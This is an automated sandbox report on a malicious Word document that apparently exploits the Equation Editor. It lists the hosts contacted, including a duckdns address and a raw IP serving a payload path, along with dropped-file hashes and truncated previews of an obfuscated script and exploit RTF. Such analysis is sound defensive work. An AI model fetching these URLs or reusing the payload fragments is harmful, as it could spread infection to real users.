95.217.202.210   zeep.ly                   Germany          DE     24940   HETZNER-AS                                        true
45.89.247.65     dremom2.duckdns.org       United Kingdom   US     33657   CMCS                                              true
178.237.33.50    geoplugin.net             Netherlands      NL     8455    ATOM86-AS ATOM86                                  false
85.239.241.184   unknown                   Czech Republic   CZ     15685   CASABLANCA-AS Internet Collocation Provider       true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1508111
Start date and time: 2024-09-09 17:33:30 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 17
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: xrrwwstCMd.docx
renamed because original name is a hash value
Original Sample Name: f27f42ce5ed4153d4d30a383c800b415d4e5b78a08556fa2b4f57bdbb0802a76.docx
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winDOCX@16/32@8/5
EGA Information:
• Successful, ratio: 71.4%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 185
• Number of non-executed functions: 316
Cookbook Comments:
• Found application associated with file extension: .docx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Override analysis time to 80111.1705693733 for current running targets taking high CPU consumption
• Override analysis time to 160222.341138747 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 3680 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 3796 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: xrrwwstCMd.docx
Time       Type              Description
11:34:34   API Interceptor   31x Sleep call for process: EQNEDT32.EXE modified
11:34:35   API Interceptor   5x Sleep call for process: wscript.exe modified
11:34:36   API Interceptor   90x Sleep call for process: powershell.exe modified
11:34:42   API Interceptor   6272378x Sleep call for process: RegAsm.exe modified
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):131072
                                        Entropy (8bit):0.025570670387298232
                                        Encrypted:false
                                        SSDEEP:6:I3DPcZtPHvxggLR0lKNp51xaRXv//4tfnRujlw//+GtluJ/eRuj:I3DPMtPPAgPUvYg3J/
                                        MD5:30840EFD5B76AE3C706DE663A65169DE
                                        SHA1:5DC11B577F0AE1E28C5F760E997EFB6D44FD7C3E
                                        SHA-256:C708F3EC03D39619C5B9E53F2AD63C49698207BEF16491B1774FEA825257450E
                                        SHA-512:57D74A91D93551509807E0C07FDCF538EA79C0462AB64B5593733AB50C017813B4C59E513EB3CD4876613A606FB97EB7A89692DC1848AF65BF350DF618823C45
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4760
                                        Entropy (8bit):4.834060479684549
                                        Encrypted:false
                                        SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                        MD5:838C1F472806CF4BA2A9EC49C27C2847
                                        SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                        SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                        SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):195478
                                        Entropy (8bit):3.8654176042193766
                                        Encrypted:false
                                        SSDEEP:3072:ElIR9Mt8PiEZZNdYogt5pNGwdBiLYXnKO81LZh+Ukf9IV:kU9Mt8PNNdYxXKv1h+U7V
                                        MD5:9C60CEE4860F1FB648D10AA19522CA83
                                        SHA1:592F4BC6EF04AFB622541DD0305272FD9A8B8100
                                        SHA-256:36083400B2237AAEC532B29FEE51CAD3CF82F4B32816716256B4A9718D118DDC
                                        SHA-512:3E349809E5EA1ABA37277B5F745AC3C45A1D375A57F4652543949334D1FFD44A5B0A62352D8B1BA9922E9A295FBD8B7C3D60BB01C91E138F0C86924DCBCE4D2C
                                        Malicious:false
                                        Preview:..N.o.A.h.Q.a.d.i.s.e.W.A. .=. .".A.Z.e.O.P.h.K.t.L.Z.O.O.".....t.i.W.d.k.n.e.K.Z.e.U.K. .=. .".d.L.i.k.f.G.L.W.k.u.e.g.".....f.O.z.q.N.K.A.z.K.A.U.Z. .=. .".n.j.m.W.W.l.R.C.K.c.K.O.".....c.k.f.l.s.O.K.q.p.f.c.f. .=. .".i.O.t.v.P.K.o.z.k.p.R.o.".....W.n.h.b.N.c.K.Z.I.I.O.i. .=. .".U.e.x.K.c.C.m.G.u.a.b.o.".....e.G.m.s.q.f.v.Q.u.L.q.B. .=. .".b.W.N.u.k.O.v.K.U.h.C.k.".....O.k.s.L.d.W.R.G.C.j.P.L. .=. .".G.K.U.i.s.f.L.L.i.A.c.q.".....j.z.l.O.O.o.l.W.U.f.A.W. .=. .".R.p.K.U.f.o.m.c.b.x.G.o.".....G.k.i.e.j.e.m.j.r.d.L.b. .=. .".A.p.q.h.m.d.Z.A.c.c.r.U.".....x.H.i.L.t.S.P.K.f.W.W.f. .=. .".p.z.B.W.J.t.N.m.m.m.t.x.".........Z.i.r.R.f.G.c.J.P.W.W.c. .=. .".W.G.a.G.c.C.A.L.d.L.m.W.".....o.A.i.U.g.r.f.Z.z.n.W.O. .=. .".i.B.B.R.t.s.d.m.i.W.W.c.".....K.i.x.r.W.d.S.Z.I.L.L.L. .=. .".A.v.m.e.c.n.f.p.u.z.P.U.".....n.K.O.c.o.u.k.u.B.R.l.n. .=. .".i.G.m.i.P.o.m.L.N.C.U.Z.".....Z.T.b.A.g.h.I.N.C.j.L.H. .=. .".d.d.i.L.K.K.R.L.k.t.H.b.".....U.G.W.W.N.U.t.k.A.L.U.P. .=. .".L.e.W.d.x.W.K.N.W.N.n.W.".....s.
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:HTML document, ASCII text
                                        Category:dropped
                                        Size (bytes):229
                                        Entropy (8bit):5.107927307299432
                                        Encrypted:false
                                        SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPsT9zyh+KqD:J0+ox0RJWWPsT92UT
                                        MD5:2860A51A652C063D9098C194B6FCB4E1
                                        SHA1:15C9A08284DD4A2879BDC3E27E7A99BA48D8969F
                                        SHA-256:1A7E5C8443EC87E996CF50B1C6D9FC0A4DC1DC37F151820E3BF56102C55C6FF5
                                        SHA-512:22497E98281F24E3FA6C370F6ABDF5CA7620EE74CD40CB20414D798B1B8D00C0C2B5060562A7C94950019DE9B1029EEB92FDDD2EC20AEC67D769180B874BD10E
                                        Malicious:false
                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://zeep.ly/rXgoN">here</a>.</p>.</body></html>.
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Rich Text Format data, version 1
                                        Category:dropped
                                        Size (bytes):91882
                                        Entropy (8bit):2.574427205264902
                                        Encrypted:false
                                        SSDEEP:384:fJZDmx9X6iX6rkdD3pDfmB1tJINb6+KpMMnpHHF907Y4V4orosTsQnKugkjx9f1:zDmxgiqodzpaBib6+iPpb0sorjlg41
                                        MD5:62188900E648315F56F777BA4D7EFC16
                                        SHA1:1190EF7602D9CD77B4D4195C6D2B05F0B572CF04
                                        SHA-256:B25FF467DF139B6BD46A471BDB1F24C986F1AC1CAAB7876A0BEC47CC8F2F8FAE
                                        SHA-512:E7505992B3B4AB682359C2A095C2DE779270BB7EC11503C45CC53112D31C54C135F2E891FE9EC78338304AE5A475A61B8FBA31BB8176120D7ABA5FD9252B7A3C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Preview:{\rtf1.......{\*\atext404961998 \+}.{\365033443141<;)?)*#?<?4|!!_=%>95%^?3?@$>??$[$8].![;4).^&[#>~4/&(|03.*#('`.+@]???#?.6..=1:>:4|=5.''?[(._[|*8?/?|>+=|9@.%336;)?$54/?,).|41$7=,8@$:>#.3;,?9`.?.:7)#'`0?>?~-%3%=&%`8~|6?6~;=,#,?-&%:@-0~;18..^.(81..)2.#.6^%*_?.|`%=1+!=-#:^'%0?3325523--]]$?#8?..|0^2?3,(0`$?.@5<.^%?|~+?51':?]/.<-8|].%2?)?~+,^),2.351-0?(/#.>9+1:!/^5.~:~60#_0~2(_7%08^?7.*;.<(6$?%@?((].?`^@*.50!?,=+(4`6`$|`_6*-)#((7%`)9-'%.?.65_9'?[,=4?,^%>7?|?34(?])#97~<?.-2#?_?.]=-%?;??&&908:#)%/&(&|;8?!`,'])]7.976..&)?]$%*%'/<[+0#38?);7>81<'`^#../_09:))3@6|:6?@7/8.13.'8?`:^9#(50/`)??=?'%]?9)%>?4&|.|8:+.5.;??9?@?^[3_=6%?%?9.:;$2%?<:].;/]@%;[47@3?~15>(.&&;3+'%.??8~$$.`[?.1??84%.'<_7.(0?!.?!@8.-1?4_*7?[<=?/?!?.74'=.($%.?[,!'*`.$?*.;??%?-=?>+?;9.'/(=`!?(.^^0].<95?<'<%_(#@``^>49^9><;?['-@_.::%@2?]='#.[^38':1_4(?$]$.|5.^'#7|1+.)-!<>@#?_]~]3.0>(,;6$$.)(-?@7:|?*>,?>+4**<5;,8.&'%||%3=^??9?->!/8%:5%%?%9/1^`^!34-'>&_1'+'~~7%`/@68^%/;.0_0/2#/>4?#?7>`)3,..%4>@.@??.*:1??..1.;;_3?%#09.?%^.(?_:.?2/4`%6676_
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):962
                                        Entropy (8bit):5.013811273052389
                                        Encrypted:false
                                        SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                        MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                        SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                        SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                        SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                        Malicious:false
                                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Rich Text Format data, version 1
                                        Category:dropped
                                        Size (bytes):91882
                                        Entropy (8bit):2.574427205264902
                                        Encrypted:false
                                        SSDEEP:384:fJZDmx9X6iX6rkdD3pDfmB1tJINb6+KpMMnpHHF907Y4V4orosTsQnKugkjx9f1:zDmxgiqodzpaBib6+iPpb0sorjlg41
                                        MD5:62188900E648315F56F777BA4D7EFC16
                                        SHA1:1190EF7602D9CD77B4D4195C6D2B05F0B572CF04
                                        SHA-256:B25FF467DF139B6BD46A471BDB1F24C986F1AC1CAAB7876A0BEC47CC8F2F8FAE
                                        SHA-512:E7505992B3B4AB682359C2A095C2DE779270BB7EC11503C45CC53112D31C54C135F2E891FE9EC78338304AE5A475A61B8FBA31BB8176120D7ABA5FD9252B7A3C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.doc, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Preview:{\rtf1.......{\*\atext404961998 \+}.{\365033443141<;)?)*#?<?4|!!_=%>95%^?3?@$>??$[$8].![;4).^&[#>~4/&(|03.*#('`.+@]???#?.6..=1:>:4|=5.''?[(._[|*8?/?|>+=|9@.%336;)?$54/?,).|41$7=,8@$:>#.3;,?9`.?.:7)#'`0?>?~-%3%=&%`8~|6?6~;=,#,?-&%:@-0~;18..^.(81..)2.#.6^%*_?.|`%=1+!=-#:^'%0?3325523--]]$?#8?..|0^2?3,(0`$?.@5<.^%?|~+?51':?]/.<-8|].%2?)?~+,^),2.351-0?(/#.>9+1:!/^5.~:~60#_0~2(_7%08^?7.*;.<(6$?%@?((].?`^@*.50!?,=+(4`6`$|`_6*-)#((7%`)9-'%.?.65_9'?[,=4?,^%>7?|?34(?])#97~<?.-2#?_?.]=-%?;??&&908:#)%/&(&|;8?!`,'])]7.976..&)?]$%*%'/<[+0#38?);7>81<'`^#../_09:))3@6|:6?@7/8.13.'8?`:^9#(50/`)??=?'%]?9)%>?4&|.|8:+.5.;??9?@?^[3_=6%?%?9.:;$2%?<:].;/]@%;[47@3?~15>(.&&;3+'%.??8~$$.`[?.1??84%.'<_7.(0?!.?!@8.-1?4_*7?[<=?/?!?.74'=.($%.?[,!'*`.$?*.;??%?-=?>+?;9.'/(=`!?(.^^0].<95?<'<%_(#@``^>49^9><;?['-@_.::%@2?]='#.[^38':1_4(?$]$.|5.^'#7|1+.)-!<>@#?_]~]3.0>(,;6$$.)(-?@7:|?*>,?>+4**<5;,8.&'%||%3=^??9?->!/8%:5%%?%9/1^`^!34-'>&_1'+'~~7%`/@68^%/;.0_0/2#/>4?#?7>`)3,..%4>@.@??.*:1??..1.;;_3?%#09.?%^.(?_:.?2/4`%6676_
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Category:dropped
                                        Size (bytes):1504468
                                        Entropy (8bit):0.9492057268722054
                                        Encrypted:false
                                        SSDEEP:1536:VrTlIEYtm7d3pzEBwCr8neyqBMOGPIJcVi3OzbgnVyJ69DuHYOM:F8m7d3pzQwoyHVwOniwcDvOM
                                        MD5:7A60DF6542BA8066F242792B6EC4C49D
                                        SHA1:744B856FD73B1A2D89EBC332AB984B7DE7DDEA14
                                        SHA-256:67F01CE7F9AF2266688882E3658D5CF976B49FE9B7B0CCE94F1D97577445B034
                                        SHA-512:E7178479D5D333CB0EEC9A69C4FA0B3502F3D833716782E4F2723608A10E29DB6D47F5455F2062B22DCEC77B3F9669B10667F7E091BC1070BF17E2DED229B307
                                        Malicious:false
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):1585664
                                        Entropy (8bit):1.4737263308016164
                                        Encrypted:false
                                        SSDEEP:3072:zpg1R8m7d3pzQwoyHVwOniwcDvOztrLh/MUYForh2BseEqpnsRE5N:zpaem5pzQwf1wsiLOBapFnseEsnsi5
                                        MD5:7451DA5608955CAED8B9F90D2790A65B
                                        SHA1:1BFD6271C4A32010642C1B1E54CA1753CCBE9FDB
                                        SHA-256:194708BD77B079B3240C07A96DC4608F577E4345BC7B24816305B78342A243B1
                                        SHA-512:088A07849431A99AB593224A668E36DD4741CFFDF5BC5C351F67EC687C176F2FB6A783907F39F4FD5C4C4F2B56BA978D6D9BFACD35AED012D39C072F68FD03F6
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):0.05390218305374581
                                        Encrypted:false
                                        SSDEEP:3:ol3lYdn:4Wn
                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                        Malicious:false
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1536
                                        Entropy (8bit):2.2277651787740167
                                        Encrypted:false
                                        SSDEEP:12:NXHH3qpWmyaEm7JU+c15br73re2Y2resZS/:9na3R7q++V/3PZk
                                        MD5:C1225E320E4392FC551D9EF96538B1D6
                                        SHA1:6FBFBF71CE870B0FD2B962D62481EDF49CA8C5E8
                                        SHA-256:C13C28D6E527C22BD4E9A30A46A671CC243C69F1C0B395A96495AE3ACB4230A9
                                        SHA-512:0081E1BCF0E0B7B55F41A5973EB5B5ED36830DAA16943C62FFF96073A3622376BFDE1D57E20A65BBEBF299205D567C3F229231354F6438270613C1123D832D5C
                                        Malicious:false
                                        Preview:.................................................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.........................E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . ...5.4.=.5...5._.2................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................d........gd].......
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):10240
                                        Entropy (8bit):3.475994872137717
                                        Encrypted:false
                                        SSDEEP:192:RuQL6kyaaWoiG/4i8rUFqGM63+hQTfc+cY8Yb2QH1rusoaZ:RBTwQZAFIm5Lx5uDaZ
                                        MD5:6E7F35806358D95A6F15B08A92F5569F
                                        SHA1:3D864287E798652C454FFE3266F0AEEC3B554F80
                                        SHA-256:5CCB648B0114CE34E3AB78C884D9C443A21B0814B59AAC434A22BCA2503A07F9
                                        SHA-512:72DB8B7DB7F751615930B8BD8B9AE01390A87C7A43C50B19A88CE12ABE80DACE39DD326657541564C9DA0CA0B44F0B5B872370E8BCD2A2A917FC22C49190672C
                                        Malicious:false
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22a9010a, page size 32768, DirtyShutdown, Windows version 6.1
                                        Category:dropped
                                        Size (bytes):21037056
                                        Entropy (8bit):1.1388596999872418
                                        Encrypted:false
                                        SSDEEP:24576:2O1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:2OEXs1LuHqqEXwPW+RHA6m1fN
                                        MD5:6121F6F21DE0FDA3E8DAEC8E08507EFF
                                        SHA1:22D2736F2A8E95F5D632A9F092DD2FE4B585ABC3
                                        SHA-256:5B5DF37365704A3D128EADB316122C37FA2E9E0BB7C5904EA0AECB0C6EFAD149
                                        SHA-512:3268168A486CD748AA0A861E52DB14F0509CF1E723E90FDE765B3D562BBC154979E7AC5B354FC7AE18A128DCA4CE99C5ED1B19972777612570734BCE98104D31
                                        Malicious:false
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                        Category:dropped
                                        Size (bytes):2
                                        Entropy (8bit):1.0
                                        Encrypted:false
                                        SSDEEP:3:Qn:Qn
                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                        Malicious:false
                                        Preview:..
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):131072
                                        Entropy (8bit):0.025648295752619395
                                        Encrypted:false
                                        SSDEEP:6:I3DPcB7hTxwHvxggLRy/gOqRXv//4tfnRujlw//+GtluJ/eRuj:I3DP8xgu/R6vYg3J/
                                        MD5:197F54287D92F839BA0895E2E089D413
                                        SHA1:FA67EFA95796A3388A05309B0A28E41352FCB8C7
                                        SHA-256:9547780500727D59977C69A5315585F09A694472AEC109B71DCA6C00BB30F9CA
                                        SHA-512:0CF391A221AECF4323E6180DEA4ECDE94B44397AEB636D93A2C4A54C43C2F4A546C2F35AA2E4EFEF8816020BD8A19136D1FD607F1ADAB342B4D91B831106D964
                                        Malicious:false
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):131072
                                        Entropy (8bit):0.025570670387298232
                                        Encrypted:false
                                        SSDEEP:6:I3DPcZtPHvxggLR0lKNp51xaRXv//4tfnRujlw//+GtluJ/eRuj:I3DPMtPPAgPUvYg3J/
                                        MD5:30840EFD5B76AE3C706DE663A65169DE
                                        SHA1:5DC11B577F0AE1E28C5F760E997EFB6D44FD7C3E
                                        SHA-256:C708F3EC03D39619C5B9E53F2AD63C49698207BEF16491B1774FEA825257450E
                                        SHA-512:57D74A91D93551509807E0C07FDCF538EA79C0462AB64B5593733AB50C017813B4C59E513EB3CD4876613A606FB97EB7A89692DC1848AF65BF350DF618823C45
                                        Malicious:false
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows 95 Internet shortcut text (URL=<http://85.239.241.184/50/gvt/>), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):55
                                        Entropy (8bit):4.726523123870049
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQYm/SXW6JTLgjyn:HRYFVm/kWGF
                                        MD5:8F4A311F2F5712F4388A959E04F6395D
                                        SHA1:6BF49957583F08FDAFFBD8CA47F13BA4BD433AD5
                                        SHA-256:414AFA16A75A690D193832FF4126A5B1C93CD99D9ED40F12DDE6D58AEE4926BF
                                        SHA-512:C080B6640D1D974C002B581C8BDC0814F76CF250C06705EC6BC8BD458F460E2D203C20BB57E01BCA8E08DB88658B3F657DF02666B3B6587E3C08E0D60A121591
                                        Malicious:true
                                        Preview:[InternetShortcut]..URL=http://85.239.241.184/50/gvt/..
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Generic INItialization configuration [misc]
                                        Category:dropped
                                        Size (bytes):97
                                        Entropy (8bit):4.966454368229661
                                        Encrypted:false
                                        SSDEEP:3:bDLe0k4/JTWYGwT9VomxWWgT9Vov:bvXnFiy
                                        MD5:FCEF36AC4063DF159966D027F9D07F82
